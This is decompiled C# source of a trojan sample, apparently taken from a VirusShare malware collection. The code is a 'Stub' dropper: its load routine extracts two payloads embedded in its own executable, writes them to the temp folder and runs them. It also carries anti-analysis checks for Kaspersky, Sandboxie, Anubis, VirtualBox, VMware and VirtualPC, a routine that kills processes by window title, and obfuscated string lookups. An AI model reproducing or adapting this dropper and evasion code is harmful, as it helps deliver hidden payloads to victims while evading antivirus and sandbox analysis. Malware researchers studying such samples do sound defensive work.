// Decompiled with JetBrains decompiler // Type: Stub.Form1 // Assembly: Stub, Version=4.9.5.9, Culture=neutral, PublicKeyToken=null // MVID: 2229516C-329C-43F8-8C26-63983DECBF21 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.IO; using System.Runtime.CompilerServices; using System.Windows.Forms; namespace Stub { [DesignerGenerated] public class Form1 : Form { private IContainer \u0002; private object \u0003; private string \u0005; private string \u0008; private RegistryKey \u0006; private object \u000E; private string \u000F; public Form1() { this.Load += new EventHandler(this.\u0002); this.\u0008 = \u000E.\u0002(-374349334); this.\u0006 = Registry.LocalMachine.OpenSubKey(\u000E.\u0002(-374349564), false); this.\u000E = RuntimeHelpers.GetObjectValue(this.\u0006.GetValue(\u000E.\u0002(-374349481))); this.\u000F = \u000E.\u0002(-374349497); this.\u0002(); } [DebuggerNonUserCode] protected override void Dispose(bool disposing) { try { if (!disposing || this.\u0002 == null) return; this.\u0002.Dispose(); } finally { base.Dispose(disposing); } } [DebuggerStepThrough] private void \u0002() { this.SuspendLayout(); this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(284, 262); this.Name = \u000E.\u0002(-374349467); this.Text = \u000E.\u0002(-374349467); this.ResumeLayout(false); } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] private void \u0002(object _param1, EventArgs _param2) { label_0: int num1; int num2; try { ProjectData.ClearProjectError(); num1 = 1; label_1: int num3 = 2; string tempPath = Path.GetTempPath(); label_2: num3 = 3; FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared); label_3: num3 = 4; string Expression = Strings.Space(checked ((int) FileSystem.LOF(1))); label_4: num3 = 5; FileSystem.FileGet(1, ref Expression); label_5: num3 = 6; FileSystem.FileClose(1); label_6: num3 = 7; string[] strArray = Strings.Split(Expression, \u000E.\u0002(-374349679)); label_7: num3 = 8; FileSystem.FileOpen(3, tempPath + strArray[3], OpenMode.Binary, OpenAccess.ReadWrite); label_8: num3 = 9; FileSystem.FilePut(3, strArray[1], -1L, false); label_9: num3 = 10; FileSystem.FileClose(3); label_10: num3 = 11; FileSystem.FileOpen(5, tempPath + strArray[4], OpenMode.Binary, OpenAccess.ReadWrite); label_11: num3 = 12; FileSystem.FilePut(5, strArray[2], -1L, false); label_12: num3 = 13; FileSystem.FileClose(5); label_13: num3 = 14; Process.Start(tempPath + strArray[3]); label_14: num3 = 15; Process.Start(tempPath + strArray[4]); label_15: num3 = 16; this.Close(); ProjectData.EndApp(); goto label_22; label_17: num2 = num3; switch (num1) { case 1: int num4 = num2 + 1; num2 = 0; switch (num4) { case 1: goto label_0; case 2: goto label_1; case 3: goto label_2; case 4: goto label_3; case 5: goto label_4; case 6: goto label_5; case 7: goto label_6; case 8: goto label_7; case 9: goto label_8; case 10: goto label_9; case 11: goto label_10; case 12: goto label_11; case 13: goto label_12; case 14: goto label_13; case 15: goto label_14; case 16: goto label_15; case 17: goto label_22; } break; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_17; } throw ProjectData.CreateProjectError(-2146828237); label_22: if (num2 == 0) return; ProjectData.ClearProjectError(); } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool antiKAV() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Process.GetProcessesByName(\u000E.\u0002(-374349682)).Length >= 1; goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } private void \u0003() { Process[] processes = Process.GetProcesses(); int index = 0; while (index < processes.Length) { Process process = processes[index]; if (string.Equals(process.MainWindowTitle, \u000E.\u0002(-374349640))) process.Kill(); checked { ++index; } } } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool antiSandboxie() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Process.GetProcessesByName(\u000E.\u0002(-374349603)).Length >= 1; goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool antiAnubis() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Operators.CompareString(Application.ExecutablePath, Application.StartupPath + \u000E.\u0002(-374349621), false) == 0; goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool antiAnubis2() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Operators.ConditionalCompareObjectEqual(this.\u000E, (object) this.\u000F, false); goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool AntiVirtualBox() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; this.\u0005(); flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349571), false) == 0; goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool AntiVmWare() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; this.\u0005(); flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349793), false) == 0; goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public bool AntiVirtualPC() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; this.\u0005(); flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349820), false) == 0; goto label_7; label_2: num2 = -1; switch (num1) { case 2: ProjectData.EndApp(); goto label_7; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_2; } throw ProjectData.CreateProjectError(-2146828237); label_7: int num3 = flag ? 1 : 0; if (num2 == 0) return num3 != 0; ProjectData.ClearProjectError(); return num3 != 0; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] private void \u0005() { // ISSUE: unable to decompile the method. } } }